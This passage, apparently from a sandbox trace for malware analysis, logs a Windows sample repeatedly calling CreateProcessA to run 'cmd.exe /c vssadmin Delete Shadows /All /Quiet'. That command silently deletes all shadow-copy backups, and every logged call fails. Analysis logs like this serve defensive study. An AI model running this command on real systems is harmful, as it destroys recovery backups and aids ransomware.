_Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.387] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.387] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.388] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.388] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 